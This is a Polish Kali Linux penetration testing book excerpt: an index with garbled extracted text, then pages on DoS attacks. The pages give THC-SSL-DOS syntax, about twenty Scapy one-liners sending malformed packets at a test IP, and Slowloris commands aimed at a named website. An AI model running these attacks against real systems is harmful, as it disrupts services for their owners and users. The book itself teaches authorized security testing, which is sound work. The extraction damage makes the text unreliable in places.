wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 35: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

